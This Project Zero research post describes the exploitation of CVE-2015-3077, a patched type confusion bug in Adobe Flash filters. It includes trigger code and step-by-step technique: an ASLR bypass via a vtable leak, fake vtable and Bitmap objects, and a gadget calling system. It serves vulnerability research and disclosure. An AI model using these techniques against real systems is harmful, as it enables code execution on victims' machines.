Project Zero: One Perfect Bug: Exploiting Type Confusion in Flash

Posted by Natalie Silvanovich, Dazed and (Type) Confused

For some attackers, it is important that an exploit be extremely reliable. That is to say, the exploit should consistently lead to code execution when it is run on a system with a known platform and Flash version. One way to create such an exploit is to use an especially high-quality bug. This post describes the exploitation of one such bug, and the factors that make it especially good for reliable exploitation.

The Bug

CVE-2015-3077 is a type confusion issue in the Adobe Flash Button and MovieClip filters setters that allows any filter type to be confused with any other filter type. I reported it to Adobe in early February 2015 and it was fixed in May. The bug occurs due to the ability of an attacker to overwrite the constructor that is used to initialize a filter object. An example of code that manifests the issue is below:

var filter = new flash.filters.BlurFilter();

object.filters = [filter];

var e = flash.filters.ConvolutionFilter;

flash["filters"] = [];

flash["filters"]["BlurFilter"] = e;

var f = object.filters;

var d = f[0];

This code is somewhat confusing because of its use of operator [], which is necessary for it to compile in Flash CS. Logically equivalent code (which is not guaranteed to compile) is below:

var filter = new flash.filters.BlurFilter();

object.filters = [filter];

flash.filters.BlurFilter = flash.filters.ConvolutionFilter;

var f = object.filters;

var d = f[0];

This code sets the filters field of object, a Button or MovieClip to a BlurFilter, which is then stored natively by Flash. The BlurFilter constructor is then overwritten by the ConvolutionFilter constructor. Then the filters getter is called and an ActionScript object to hold the native BlurFilter is constructed, however, the constructor has been overwritten, so the ConvolutionFilter constructor is called. This leads to an object of type ConvolutionFilter that is backed by a native BlurFilter being returned.

The end result of this is that the fields of the ConvolutionFilter can be accessed (read or written) as if it was a BlurFilter, and likewise for any other filter type. This allows a wide array of manipulation that is useful for exploitation.

The following diagram shows the layout in memory of the native objects that can potentially be confused using this vulnerability in 64-bit Linux.

AS2 Filter Types

In two situations, pointers line up with integers or floats that can be manipulated, which means that pointers can be read and written directly. Also, since the fields of the objects are ordered and sized based on the class definition, they are always in an expected location, so reading and writing will never fail. These properties are important in making the exploit reliable.

The Exploit

Since exploiting this issue would likely require triggering the type confusion issue many times, I started off by creating a utility function that performed the type confusion, FilterConfuse.confuse. It also performs some cleanup, such as setting the ActionScript filter constructors back to normal so that the vulnerable function can be called multiple times without impacting the behaviour of ActionScript outside of the function.

The first step was to bypass ASLR by determining the address of a vtable. An ideal way to do this would be to confuse an object with a vtable with an object with a member overlapping the vtable that can be manipulated, but all filter objects have vtables at the same offset. Instead, I used the BitmapData object in DisplacementMapFilter to determine the vtable address.

To determine the location in memory of the BitmapData object, I confused the DisplacementMapFilter with a BevelFilter. This caused the BitmapData pointer stored in the DisplacementMapFilter to line up with the color properties (shadowColor, shadowAlpha, highlightColor and highlightAlpha) of the BevelFilter. These properties are backed by two 32-bit integers (shown as scolor and hcolor above and below), and the color properties access the bottom 24 bits of each integer while the alpha properties access the top 8 bits. Reading these properties and combining them using bitwise arithmetic, it is possible to extract the exact address of the BitmapData object.

Next, we need to read the vtable out of the top of the BitmapData object. To do this, I used the matrix property of the ConvolutionFilter object. This property is stored as a pointer to an array of floats that are allocated when the property is set, and an ActionScript array containing these floats is returned when the property is retrieved. By setting the matrix pointer to the BitmapData object, it is possible to read out the contents of this object in memory as an array of floats.

To set the pointer, I confused a ConvolutionFilter object with a DisplacementMapFilter object (not the same DisplacementMapFilter as used above!) and set the mapPoint property to the pointer location of the BitmapData object above. The mapPoint property is a point with x and y coordinates that are both integers (p_x and p_y in the figure below) that line up with the matrix pointer in the ConvolutionFilter, which made it easy enough to set this value. It was then possible to read the vtable from the BitmapData object by reading the matrix array from the ConvolutionFilter object (note that the object had to be confused to a DisplacementBitmapFilter and then confused back to a ConvolutionFilter to allow this).

Retrieving the vtable pointer value

At this point, it becomes more difficult to make this exploit reliable due to the use of floats. The vtable_low and vtable_high values are read from the ConvolutionFilter matrix as floats, as that is the array type, but unfortunately, not every possible valid value of a pointer is also a valid float. This means it’s possible that reading the value will lead to NaN, or worse, a numeric value that is not quite correct.

The ideal solution to this problem would be to access vtable_high and vtable_low through a getter that interprets them as integers, but one is not available, as filter members tend to be floats due to the nature of their functionality.

Fortunately, though, the AS2 virtual machine is lazy with regards to interpreting floats-- it only converts a value in memory to a float when an operation in ActionScript is performed on it. Native operations generally do not cause floats to be interpreted, unless the specific operation, such as arithmetic requires it. This means that when a float from the matrix array is copied to vtable_low or vtable_high, it will maintain its value in memory, even if it is invalid for a float, until the variable it was copied to is actually used in ActionScript, or has arithmetic performed on it in native code. So if the variable value is immediately type confused to a different type that supports a full range of 32-bit values, such as an int, it is guaranteed that it will be the same value as the original value in memory of the matrix array. So to avoid introducing unreliability into the exploit, it is necessary to perform this type confusion before manipulating any floats in ActionScript.

To do this, I wrote a conversion class, FloatConverter, that uses type confusion in filters to implement integer-to-float and float-to-integer functions. It confuses the ColorMatrixFilter matrix property (not to be confused with the ConvolutionFilter matrix property) which is a series of inline floats with the GlowFilter color and alpha properties, which access different bytes of an int.

Float converter

While this implements reliable float-to-int conversion, unfortunately, it is not reliable for int-to-float. The way the the color array in the ColorMatrix filter is accessed in ActionScript, the entire array is copied, even if only the first element is accessed. When the array is copied, each element is converted to a Number, which sometimes involves accessing pointers (for example, calling valueOf on an object). Since the color array is longer than the entire GlowFilter class, it extends onto the heap when confused with a GlowFilter. This means that conversion could occur on unknown values on the heap, possibly leading to crashes if they reference invalid pointers when being converted to Numbers. So for int-to-float, I implemented a float converter (below) that uses a different confusion in ConvolutionFilter and DisplacementMapFilter that is a direct cast, and does not cause any unknown values on the heap to be accessed.

This solves the problem of crashes due to accessing unknown heap values, but unfortunately, there is one more issue with reliability in this exploit relating to floats. It occurs due to the implementation of the ConvolutionFilter matrix getter. In ActionScript 2, all numeric values are stored as type Number, which is a union between an integer and a pointer to a double. The native ConvolutionFilter matrix is stored as an array of floats, but it is copied into an ActionScript array so that it can be accessed in ActionScript when the matrix getter is called, and its values are cast to doubles in the process. Then, when the float converter is called on the values, they are cast back to floats.

Casting a float to a double and back generally conserves its value, except in one specific case, if the float value is an SNaN. According to the floating point specification, there are two types of NaNs, quiet NaNs (QNaNs) and signalling NaNs (SNaNs). QNaNs do nothing if they occur, but SNaNs throw a floating point exception in some situations. In x86, casting a double to a float always results in a QNaN (even if the double resulted from an SNaN) to avoid unexpected exceptions.

So if the lower bits of a pointer happen to be an SNaN, it will be converted to a QNaN, which means that one bit (the first bit of the mantissa, bit 22) will be set when it shouldn’t be. This problem is avoidable when the vtable is being read-- the third byte of the pointer, which contains the bit that gets flipped can be read unaligned to verify what its real value is. So the code will do an unaligned read (by performing the read of the vtable a second time with the Bitmap pointer incremented by one) and correct the int value if the float happens to be an SNaN.

Using the float converters implemented above, the vtable address can then be converted to an integer. Now we need to gain code execution using this address. An easy way to move the instruction pointer is to overwrite a vtable of an object (or a pointer to an object that has a vtable). This can be done by confusing the ConvolutionFilter matrix array with the DisplacementFilter BitmapData pointer.

BitmapData objects consist of a series of native backing objects. The ActionScript object contains a pointer to a BitmapData native object, which then contains pointers to other native objects. One such object is the bits object, which contains the actual bitmap bits. This bits object contains many virtual methods which are often the first methods called when any action is performed on the BitmapData object. To take advantage of this, the exploit creates a fake BitmapData object with a pointer to a fake bits object, and then calls a method which will lead to a virtual method call on the fake bits object.

The ConvolutionFilter.matrix property can be used to allocate a buffer of floats of any size via its setter as described above. The location of this buffer can then be determined by confusing the ConvolutionFilter with a DisplacementMapFilter and using the DisplacementMapFilter mapPoint property, similar to what was done to read the vtable location. Since the allocated arrays are immutable, it is necessary to first create a fake vtable object and then a fake bits object pointing to the vtable, and then create a fake bitmap pointing to it.

The first step is creating a fake vtable and determining its address using ConvolutionFilter/DisplacementMapFilter confusion.

Creating a fake vtable

Then, fake bitmap bits can be created and retrieved using the same method.

Creating a fake Bitmap Bits

Finally, a fake Bitmap pointing to the bits is created.

Creating a fake Bitmap

A reference to the fake bitmap can then be retrieved in ActionScript by setting a DisplacementMapFilter object’s BitmapData object to the pointer to the fake bitmap by confusing it with a BevelFilter, and setting the color properties to the pointer value, the reverse of what was done to read the location of the original BitmapData object the vtable was read out of. This object can then be confused back to a DisplacementMapFilter and the BitmapData object accessed by calling the mapImage getter. Then, whenever a method containing a virtual call (such as setPixel32) is called on the object, the method will call into the location specified in the fake vtable.

At this point, it’s worth looking into what’s actually in the fake vtable in more detail. The previous discussion of the float converter ignored one issue with SNaNs: writing floats. The ConvolutionFilter.matrix setter also converts floats to doubles and back before writing them, so if a pointer happens to be an SNaN value, and then gets written to the matrix array, bit 23 will get set, even if it is not set in the original value. This can be avoided in a limited way by using unaligned writes.

In memory, an SNaN pointer is laid out as follows:

00: XX XX YY QQ XX ZZ 00 00

Where:

XX can be any value from 0 to 0xFF

YY has bit 5 set to zero and no other constraints

QQ has all bits set to one except for bit 7 which can be 1 or 0

ZZ is a value with bit 7 set to zero with no other constraints.

It can be written unaligned as 32-bit floats as follows:

00: 00 XX XX YY

04: QQ XX ZZ 00

08: 00 00 00 00

This guarantees that if the original pointer is an SNaN, none of the unaligned values will be SNaNs (as YY will always have bit 5 unset if the original float is an SNaN). It is not possible to do this with two consecutive pointers (unless they are known to both be SNaNs), though as the layout would then be:

00: 00 XX XX YY

04: QQ XX ZZ 00

08: 00 XX XX XX

0C: QQ XX ZZ 00

10: 00 00 00 00

The float at 0x08 has bits 22 to 31 unconstrained, so it could end up being an SNaN and be written incorrectly.

So it is possible to write any pointer to a float array, regardless of whether it is an SNaN or not an SNaN, but it can only be done once. After the initial pointer has been written, all additional pointers need to be an SNaN if the original pointer was an SNaN and not an SNaN if the original pointer was not an SNaN. This exploit manages this constraint by only ever writing one pointer to any ConvolutionFilter.matrix array.

For the fake Bitmap and fake Bitmap bits, this is easy, as they only need to contain one pointer. The challenge is that the fake vtable can only contain one pointer. This makes it difficult to both set up parameters for a call and make a call.

A good solution would be to move to a buffer that is fully modifiable after the first call to the vtable. Fortunately, the BitmapData class (which the fake bitmap is emulating) has a method, paletteMap which creates such a buffer. This method has four parameters (redArray, greenArray, blueArray and alphaArray) which are ActionScript arrays of Numbers. When this method is called, they are converted to integers, and copied to a native Array of ints. Then, another native method with four pointers to this array (at appropriate offsets for the input arrays) is called. This method then makes the virtual call that jumps into the fake vtable.

As a part of the initial call, the array pointers are stored in x64 registers r12, r13, r14 and r15. This is very useful, as it makes pointers to four controllable buffers available. The single pointer in the fake vtable is then the following gadget:

mov rdi, r13

call [r12]

The buffer at r13 is set to the string “gedit”, and the buffer at r12 is set to a pointer to a gadget in the Flash library that calls the method system (with no concerns about SNaNs). This will cause gedit to be launched when the virtual call into the fake vtable is made.

This exploit is deterministic up to this point, though it does not exit cleanly (the Flash player crashes when gedit is exited). This should be fairly trivial to fix by putting multiple calls into the four available buffers, though. Even if this was fixed, it is not able to survive the destruction of the Flash Player (for example, if the tab is closed, or the swf is refreshed). This is because calling the destructor of the filter objects will cause crashes due to confusion of pointers to ConvolutionFilter matrix arrays with pointers to BitmapData objects. These objects are allocated on different heaps, so calling delete on one object when the other was expected will lead to a crash. It is not possible to correct this by type confusing these objects ‘back’ to a good state, as type confusion in this specific bug creates a copy of the object, so the original bad object will remain, and still need to be freed. It is also not possible to fix the problem by setting the parameters on the original object, as the BitmapData object and matrix object setters attempt to delete any existing object before setting it. It is possible to avoid this crash while the exploit in is progress, and as long as the player remains open, by retaining references to the objects so they won’t be freed. The crash will still occur when the player is destroyed though. That said, it should be possible for the code executed by the exploit to avoid the crash by correcting the type confused objects in memory, either by putting them in a correct state, or setting their destructor pointers to null. This is not implemented in this proof-of-concept exploit though.

What Makes this Bug Reliable?

While type confusion is generally exploitable, there are a few factors that make CVE-2015-3077 especially amenable to reliable exploitation.

When type confusion is triggered, it always includes two types, the original type of the vulnerable object when it is instantiated, and the confused type that it becomes after the vulnerability is triggered. How the original type object members align with the confused type object members has a big impact on the exploitability and the reliability of the issue. In this case, vulnerable original type members (i.e. pointers) line up with confused type members that can be directly manipulated by the attacker and vice versa. This is a best case scenario that leads to reliable exploitation. Another common scenario is where the vulnerable original type members extend past the confused type members and their values are determined by out-of-bounds memory. This situation is usually exploitable, though not as reliably, as it can be difficult to ensure that heap blocks line up with the object in memory as expected. Another possibility is that there are limits on how objects can be manipulated, for example, the original type object’s members can only be set to a limited number of values, and the confused object can only be read, or only have one specific method called on it. This situation tends to either be exploitable or not, based on the specific nature of the bug, and can also lead to bugs such as info leaks that need to be combined with other bugs to be exploitable. It is possible that this type of bug could be exploited reliably, but it would need to be a very ‘lucky’ bug that happens to have the right members with the right values.

Another aspect of this bug is that type confusion occurs at the end of the vulnerable function that causes the confusion. This is important because it means that an object can be confused, and then never manipulated in a way that the attacker doesn’t want it manipulated. Some type confusion bugs can be unreliable or unexploitable because methods that are called after the confusion occur use the type confused objects in ways that expect it to be valid when it is not. Note that in the exploit above, the MovieClip object that the type confused field occurs in is set to have 0 by 0 dimensions. This prevents certain calls to the filter objects that could cause unreliability from occurring, as filters do not need to be applied to an object with no pixels.

Also, in this bug, object members outside of the ones that the attacker chooses to access are not used by the software. This is another problem that can impact the reliability and exploitability of type confusion bugs. Sometimes, a non-useful (from an attack perspective) member can cause crashes if it’s not possible for the attacker to correct it. Once again, setting the MovieClip to 0 by 0 prevents this, as filter methods are not accessed by Flash for an image with no pixels.

Finally, the ability to hold a reference to both the original and confused objects is important, as it prevents garbage collection, which almost always leads to a crash if it’s called on a type-confused object. Garbage collection assumes that object members are ‘correct’ in certain ways, such as containing valid pointers, which can cause crashes if this is not true, and it is usually not possible for an attacker to correct this, as garbage collection can occur at any time, so any window of invalidity is a problem. The only completely reliable solution is to prevent garbage collection while the objects are valid.

Conclusion

A number of factors, including the layout of the original and confused objects members, how and when the object is used and whether the object is subject to garbage collection can affect the reliability of a type confusion bug. CVE-2015-3077 is an especially high-quality bug that can be exploited very reliably due to a convergence of these factors. Exploiting this bug required triggering the bug up to 31 times: eight times to get and set the object members needed for the exploit and 19 to 23 times for float conversion, depending on the number of SNaNs that occur. While this may seem large, the exploit is reliable because each step is deterministic and does not rely on any behaviour that is not guaranteed to occur.

Project Zero

Monday, July 20, 2015

One Perfect Bug: Exploiting Type Confusion in Flash

The Bug

The Exploit

1 comment: